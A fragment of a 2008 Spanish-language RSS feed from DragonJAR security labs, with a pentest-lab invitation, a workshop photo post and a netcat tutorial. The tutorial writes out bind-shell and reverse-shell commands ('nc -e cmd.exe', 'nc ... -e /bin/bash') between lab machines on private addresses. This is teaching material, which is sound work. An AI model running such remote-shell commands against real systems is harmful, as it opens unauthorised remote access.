		<link>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo</link>
		<comments>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo#comments</comments>
		<pubDate>Thu, 18 Dec 2008 20:38:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=488</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">&#8220;Hace días venía madurando la posibilidad de ofrecer los mismos laboratorios que vengo desarrollando en la ciudad de Medellín pero en modo virtual:<br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-laboratorio-de-informatica-forense-en-medellin" target="_blank"><strong>Desarrollo del Laboratorio de Informática Forense en Medellín</strong></a><br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias" target="_blank"><strong>Desarrollo del HackTaller 05 Medellín &#8211; Fotografías</strong></a><br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto" target="_blank"><strong>Desarrollo del HackTaller 06 en Medellín &#8211; Fotografías y Escenario propuesto</strong></a>&#8221;</p>
<p style="text-align: justify;">Este será llevado a cabo el próximo sabado 20 de diciembre &#8211; 2:00 PM To 4:00 PM (GMT-05:00) Eastern Time (US &amp; Canada)</p>
<p>Los interesados deben enviarme un correo electrónico, al cual yo responderé con el enlace al salón virtual.</p>
<p>4v4t4r @ gmail . com</p>
<p style="text-align: justify;"><span id="more-488"></span>La temática para este primer laboratorio virtual es la siguiente:</p>
<p><strong>Test de Penetración 1 (Introducción y Desarrollo)</strong></p>
<p>La finalidad de este primer Laboratorio virtual de Test de Penetración, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.</p>
<p>Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.</p>
<p><strong>Escenario propuesto:</strong></p>
<p>El escenario para este Laboratorio es el de un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus). Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le dá un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.<br />
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.</p>
<p>El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.<br />
Demostrar que el sistema es vulnerable sería la mejor manera de concientizar al Director General, para desde allí implementar mejores prácticas en materia de seguridad Informática.<br />
&#8212;&#8212;&#8212;-</p>
<p>De esta manera hago la invitación a todos los interesados en participar. No existe entonces la limitación geográfica que muchos usuarios presentan <img src="http://comunidad.dragonjar.org/Smileys/default/smiley.gif" border="0" alt="Sonrisa" />.</p>
<p style="text-align: justify;">Por ahora y como vieron en la descripción se hace necesario tener la distribución BackTrack.</p>
<p>La idea entonces es que descarguen la imágen y la configuren en una máquina virtual (VMWare Player / WorkStation / Server).<br />
Como sugerencia personal preferiría que descargaran la siguiente máquina virtual ya creada, con las vmware tools instaladas y lista para ser usada.</p>
<p><a href="http://anonym-url.com/go.php?to=http://174.36.1.2/bt3.7z" target="_blank"><strong>Descargar Máquina Virtual BackTrack 3</strong></a> (Desarrollada por <a href="http://anonym-url.com/go.php?to=http://bagside.com/bagvapp/index.html" target="_blank"><strong>Bagside</strong></a>)</p>
<p style="text-align: justify;">Ahora publico el sistema que será objeto del Test de Penetración.</p>
<p><a href="http://anonym-url.com/go.php?to=http://www.sendspace.com/file/hglz1o" target="_blank"><strong>Descargar imágen de Entorno Virtualizado de Intrusion +/- 195Mb</strong></a></p>
<p>La idea es que vayan leyendo los enlaces que publiqué anteriormente, además pueden ir descomprimiendo la máquina virtual BackTrack (+/- 1.5Gb).<br />
Recuerden además que este laboratorio será desarrollado en cualquiera de los productos VMWare (WorkStation, Player, Server), aunque de todas maneras mostraré como puede configurarse en Qemu. Así que por lo tanto deben tener instalado cualquiera de esos productos (preferiblemente VMWare WorkStation).</p>
<p>El laboratorio promete, así que espero no se lo pierdan, mucho menos las personas de otras ciudades y paises que han querido participar en los Hack Labs que realizo en mi ciudad.</p>
<p>Para ese día deben tener un buen sistema de sonido (ej. diadema o audífonos, para poder recepcionar bien el audio).<br />
Espero además que tengan una buena conexión a internet, pues algunos recursos así lo requieren.</p>
<p>Aún sigo esperando los correos electrónicos de las personas que estén interesadas, hasta el momento solo he recibido 8 correos, y solo puede ser transmitida la invitación por ese medio.<br />
De la buena asistencia depende de que continúe o no con la realización y publicación de los mismos <img src="http://comunidad.dragonjar.org/Smileys/default/wink.gif" border="0" alt="Gi&amp;ntilde;ar" /></p>
<p><strong>Textos e información de interés:</strong></p>
<p><a href="../descubrimiento-de-aplicaciones-nmap" target="_blank">http://labs.dragonjar.org/descubrimiento-de-aplicaciones-nmap</a><br />
<a href="../video-tutorial-de-instalacion-de-backtrack-3" target="_blank">http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3</a><br />
<a href="../test-de-penetracion-con-backtrack-netcat" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat</a><br />
<a href="../test-de-penetracion-con-backtrack-servicios-basicos" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos</a><br />
<a href="../test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi</a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo/feed</wfw:commentRss>
		<slash:comments>28</slash:comments>
		</item>
		<item>
		<title>Desarrollo del HackTaller 05 Medellín &#8211; Fotografías</title>
		<link>http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias#comments</comments>
		<pubDate>Sun, 16 Nov 2008 14:52:01 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=335</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Nuevamente muchas gracias a todos y todas las asistentes a este 5° HackTaller realizado en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="all" src="http://img356.imageshack.us/img356/6280/allar9.jpg" alt="" width="450" height="338" /></p>
<p style="text-align: justify;">En el transcurso de la semana iré publicando el ambiente virtualizado de intrusión que utilicé para esta sesión, así mismo publicaré los videos de como realizarlo (solo uno de los métodos para realizarlo, pues existen algunos más).</p>
<p style="text-align: justify;">La asistencia fue masiva, pues al completarse el registro para una persona por computador, muchos atendieron a la opción que dí, la cual consistía en que llevaran sus equipos portátiles personales.</p>
<p style="text-align: justify;"><span id="more-335"></span>Este HackTaller sirvió para entrar en contacto de una manera más práctica con la temática de la seguridad informática, más especificamente con los Test de Intrusión, concientizó a todos los asistentes sobre lo mucho que aún nos falta por aprender y que este espacio y este tipo de eventos nos permitirán mejorar , investigar y desarrollar capacidades cognoscitivas.</p>
<p style="text-align: justify;">El próximo sabado repetiré este mismo HackTaller con las personas que esten interesadas en asistir y que no alcanzaron cupo. El martes confirmo la realización del mismo.</p>
<p style="text-align: justify;">No queda nada más que agradecer a todos los asitentes, como siempre a Jhony y Sebas quienes siempre están pendientes y dispuestos a facilitarme el espacio, a los nuevos amigos del Sena, quienes se hicieron presentes y compartieron de este HackTaller (y que le dirán a fernando que les enseñe todo lo que el sabe), a los compañeros de SoftNet (quienes por amor al arte les toco sentados en el piso con sus laptops) que amablemente ofrecieron algunos dispositivos que poseen en sus trabajos.</p>
<p style="text-align: justify;">A todos los que no pudieron asistir se les extrañó, y espero que puedan hacerlo para el próximo HackTaller <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p style="text-align: justify;">Dejo a continuación el enlace de acceso al registro fotográfico del HackTaller, (<span style="text-decoration: line-through;">no quedé en ninguna foto&#8230; ando de fotografo últimamente XD creo que moriré de hambre&#8230;</span>)</p>
<h2 style="text-align: justify;"><a href="http://www.flickr.com/photos/31597104@N06/sets/72157609204085715/" target="_blank"><strong>Galería Fotográfica del 5° HackTaller realizado en Medellín</strong></a></h2>
<h2 style="text-align: justify;"><a href="http://www.flickr.com/photos/31597104@N06/sets/72157609204085715/show/" target="_blank">Galería en modo presentación</a></h2>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Netcat</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat#comments</comments>
		<pubDate>Thu, 06 Nov 2008 21:55:48 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=312</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Netcat (a menudo referida como la navaja multiusos de los hackers) es una herramienta de red bajo licencia GPL (en la versión de GNU) disponible para sistemas UNIX, Microsoft y Apple que permite a través de intérprete de comandos y con una sintaxis muy sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos).</p>
<p style="text-align: justify;"><span id="more-312"></span>Sus capacidades hacen que sea a menudo usada como una herramienta para abrir puertas traseras una vez invadido un sistema y obtenido privilegios de administrador o root del equipo. También resulta extremadamente útil a efectos de depuración para aplicaciones de red.</p>
<p style="text-align: justify;">Ya en desuso, originariamente se trataba de una potentísima herramienta de red para administradores no habiéndose descubierto hasta la fecha el total de los comandos que se utilizaban, los cuales permanecen secretos por las particularidades de esta herramienta. (<a href="http://netcat.sourceforge.net/" target="_blank"><strong>Más información &#8211; Web Oficial</strong></a>)</p>
<p style="text-align: justify;">En muchas ocasiones y por diferentes razones se hace necesario realizar conexiones a puertos TCP y UDP.</p>
<p style="text-align: justify;">Algunas de estas razones pueden ser:</p>
<ul style="text-align: justify;">
<li>Cuando necesitamos comprobar la disponibilidad de un puerto (si este se encuentra abierto o cerrado).</li>
<li>Cuando queremos leer el banner de dicho puerto (servicio gestionado por el mismo).</li>
<li>Cuando necesitamos conectarnos a un servicio de red de manera manual.</li>
</ul>
<p style="text-align: justify;">El modo de uso de netcat ya ha sido tratado de manera superficial en algunos laboratorios. Trataremos entonces de profundizar un poco más en este laboratorio sobre las posibilidades de la herramienta, aunque tampoco será la &#8220;Guía definitiva de Netcat&#8221;, si nos acercará un poco más a la misma.</p>
<p style="text-align: justify;">Algunas de las publicaciones donde he hecho referencia sobre netcat son las siguientes:</p>
<p style="text-align: justify;"><a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i" target="_blank"><strong>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Identificación de Banner’s (Banderas) I</strong></a><br />
<a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii" target="_blank"><strong>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Scanning II</strong></a><br />
<a href="http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii" target="_blank"><strong>Solución del HackTaller 01 DragonJAR (II de VIII)</strong></a><br />
<a href="http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-iii-de-viii" target="_blank"><strong>Solución del HackTaller 01 DragonJAR (III de VIII)</strong></a></p>
<p style="text-align: justify;"><strong>Ayudas y Opciones de Comandos</strong></p>
<p style="text-align: justify;"><strong>Nota:</strong> Netcat es una herramienta que viene incluída y lista para ser usada desde la distribución Linux BackTrack, la cual es el objeto de estudio de esta serie de prácticas.</p>
<p style="text-align: justify;">Uno de los primero acercamientos a netcat que debe realizar cada investigador es la exploración del propio sistema de ayudas y opciones de comandos que incluye la herramienta. Para ello bastará con ejecutar la siguiente sintaxis desde la línea de comandos:</p>
<p style="text-align: justify;"><strong>nc -h</strong></p>
<p style="text-align: justify;">Para lo cual obtendremos el siguiente resultado:</p>
<p style="text-align: justify;"><strong>nc -h<br />
[v1.10]<br />
connect to somewhere: nc [-options] hostname port[s] [ports] &#8230;<br />
listen for inbound: nc -l -p port [-options] [hostname] [port]<br />
options:<br />
-e prog program to exec after connect [dangerous!!]<br />
-g gateway source-routing hop point[s], up to 8<br />
-G num source-routing pointer: 4, 8, 12, &#8230;<br />
-h this cruft<br />
-i secs delay interval for lines sent, ports scanned<br />
-l listen mode, for inbound connects<br />
-n numeric-only IP addresses, no DNS<br />
-o file hex dump of traffic<br />
-p port local port number<br />
-r randomize local and remote ports<br />
-s addr local source address<br />
-t answer TELNET negotiation<br />
-u UDP mode<br />
-v verbose [use twice to be more verbose]<br />
-w secs timeout for connects and final net reads<br />
-z zero-I/O mode [used for scanning]<br />
port numbers can be individual or ranges: lo-hi [inclusive]</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img511.imageshack.us/img511/996/netcat1px6.jpg" alt="" width="450" height="540" /></p>
<p style="text-align: justify;"><strong>Identificación de Banners e información</strong></p>
<p style="text-align: justify;">Para intentar una conexión y obtener información de un sistema y puerto específico la sintaxis es la siguiente:</p>
<p style="text-align: justify;"><strong>nc -vv IP/HostName Puerto</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img300.imageshack.us/img300/6339/netcat2by4.jpg" alt="" width="450" height="346" /></p>
<p style="text-align: justify;">Una vez visualizada la información requerida procedemos a detener la ejecución con la combinación de teclas Ctrl + C.</p>
<p style="text-align: justify;"><strong>Consultando el Servidor Web que gestiona un sistema Objetivo</strong></p>
<p style="text-align: justify;">Se trata de realizar una conexión al puerto comunmente utilizado para servir páginas Web (80), luego se envía una petición HTTP / HEAD para obtener y leer el banner del servidor HTTP. Para ello ejecutaremos la siguiente sintaxis:</p>
<p style="text-align: justify;"><strong>nc -vv IP/HostName Puerto</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/9316/netcat3bm2.jpg" alt="" width="450" height="366" /></p>
<p style="text-align: justify;"><strong>Netcat a la escucha sobre puertos TCP/UDP y Chat<br />
</strong></p>
<p style="text-align: justify;">Establecer a Netcat en modo &#8220;listen&#8221; (escucha) en un puerto TCP / UDP es una de las tareas más implementadas con la herramienta, pues permite depurar clientes y/o aplicaciones de red, envío/recepción de datos, ejecución de terminales, etc.</p>
<p style="text-align: justify;">Vamos como establecer a Netcat en modo &#8220;listen&#8221; (escucha) y como podemos implementar sobre el mismo un pequeño pero útil sistema de Chat entre dos equipos.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/9841/netcat4dt9.jpg" alt="" width="450" height="447" /></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img509.imageshack.us/img509/3803/netcat5vm4.jpg" alt="" width="450" height="414" /></p>
<p style="text-align: justify;">La máquina con Linux BackTrack será el sistema donde se establezca Netcat en modo &#8220;listen&#8221;, veamos:</p>
<p style="text-align: justify;"><strong>nc -lvv 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img354.imageshack.us/img354/7607/netcat6kb3.jpg" alt="" width="356" height="318" /></p>
<p style="text-align: justify;">El cliente será el sistema Windows</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img361.imageshack.us/img361/9703/netcat7tx4.jpg" alt="" width="450" height="409" /></p>
<p style="text-align: justify;"><strong>Transferencia de Archivos con Netcat</strong></p>
<p style="text-align: justify;">Otra de las bondades que permite realizar Netcat es la posibilidad de habilitar una conexión para transferir archivos entre dos equipos. Esto permitirá entonces enviar/recibir archivos de texto y/o binarios entre ellos.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">Debemos ejecutar la siguiente sintaxis:</p>
<p style="text-align: justify;"><strong>nc -lvp 12345 &gt; salida.txt</strong></p>
<p style="text-align: justify;">El equipo server (Linux BackTrack) estará habilitado en modo listen (escucha) y redireccionando los datos recibidos a un archivo de salida, veamos:</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img146.imageshack.us/img146/6551/netcat8ob1.jpg" alt="" width="395" height="321" /></p>
<p style="text-align: justify;">El equipo cliente (Windows) establecerá la conexión con BackTrack (al puerto 12345) y enviará el archivo.<br />
para ello primero crearemos el archivo de texto a enviar. Veamos:</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img504.imageshack.us/img504/8930/netcat9do1.jpg" alt="" width="463" height="239" /></p>
<p style="text-align: justify;">Así se vería desde el servidor BackTrack cuando recibe los datos</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img378.imageshack.us/img378/5779/netcat10os7.jpg" alt="" width="408" height="269" /></p>
<p style="text-align: justify;">Luego procedemos a comprobar la información contenida en el envío</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img136.imageshack.us/img136/9493/netcat11np8.jpg" alt="" width="415" height="292" /></p>
<p style="text-align: justify;"><strong>Administración Remota con Netcat (Shell)<br />
</strong></p>
<p style="text-align: justify;">Sin lugar a dudas esta es una de las mejores utilidades que se le pueda dar a Netcat, pues como hemos visto esta grandiosa herramienta permite redireccionar instrucciones y comandos. Esto significa que podemos tomar por ejemplo un archivo .exe y redirigir la entrada/salida y mensajes de error a los puertos TCP/UDP que establezcamos.</p>
<p style="text-align: justify;">Veamos en la práctica como podemos redirigir el ejecutable CMD.EXE a un cliente de red en un puerto local. De esta manera ofreceremos una línea de comandos a cualquier usuario que establezca una conexión a nuestro equipo y puerto establecido.</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">Windows hará el papel de servidor, quién ofrecerá una línea de comandos a los clientes que establezcan una conexión con él.</p>
<p style="text-align: justify;"><strong>nc -lvp 12345 -e cmd.exe</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img243.imageshack.us/img243/2668/netcat12iu5.jpg" alt="" width="405" height="257" /></p>
<p style="text-align: justify;">Ahora desde BackTrack, quién actua como cliente, establecerá una conexión con Windows. Veamos:</p>
<p style="text-align: justify;"><strong>nc -v 10.30.3.116 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img151.imageshack.us/img151/7813/netcat13my1.jpg" alt="" width="413" height="373" /></p>
<p style="text-align: justify;"><strong>Shell Inversa con Netcat</strong></p>
<p style="text-align: justify;">A diferencia del escenario anterior y como en muchas ocasiones sucede, no se puede controlar y administrar las salidas/entradas o disposición de puertos. Para ello Netcat nos ofrece otra solución más en su repertorio. Se trata entonces de establacer a Netcat en modo &#8220;listen&#8221; y el posterior envío/recepción de comandos, entre ellos la ejecución de una terminal. Veamos:</p>
<p style="text-align: justify;">Para ello contamos con dos máquinas (Windows/Linux)<br />
<strong>Windows:</strong> IP 10.30.3.116<br />
<strong>Linux:</strong> IP 10.30.3.84</p>
<p style="text-align: justify;">En este caso el sistema Windows pretende obtener una shell del sistema Linux BackTrack, con la limitante de que BackTrack no puede en ese momento servir una shell en modo &#8220;Listen&#8221;.</p>
<p style="text-align: justify;">Desde Windows se establece el modo Listen:</p>
<p style="text-align: justify;"><strong>nc -lvp 12345</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img262.imageshack.us/img262/6366/netcat14wp3.jpg" alt="" width="343" height="255" /></p>
<p style="text-align: justify;">Ahora desde Backtrack se establece la conexión hacia Windows y la instrucción que este deberá servir al mismo:</p>
<p style="text-align: justify;"><strong>nc -v 10.30.3.116 12345 -e /bin/bash</strong></p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img300.imageshack.us/img300/3433/netcat15fu3.jpg" alt="" width="411" height="367" /></p>
<p style="text-align: justify;">Enviemos una instrucción (comando) desde Windows para que el resultado pueda ser visualizado desde el mismo.</p>
<p style="text-align: center;"><img class="aligncenter" title="netcat" src="http://img146.imageshack.us/img146/1160/netcat17ja3.jpg" alt="" width="450" height="321" /></p>
<p style="text-align: justify;">Estos son solo algunos de los muchos usos que se le pueden dar a Netcat, por ello es que se le conoce como la navaja suiza de las redes <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> .</p>
<p style="text-align: justify;">A partir de este momento queda abierto el espacio para que los interesados profundicen en el uso de la herramienta.</p>
<p style="text-align: justify;">Recomiento la lectura de estas páginas web, donde se detallan algunos usos e información de la herramienta:</p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Netcat" target="_blank"><strong>Crysol<br />
Netcat en la Wikipedia</strong></a><br />
<a href="http://netcat.sourceforge.net/" target="_blank"><strong>Web Oficial de Netcat</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
	</channel>
</rss>

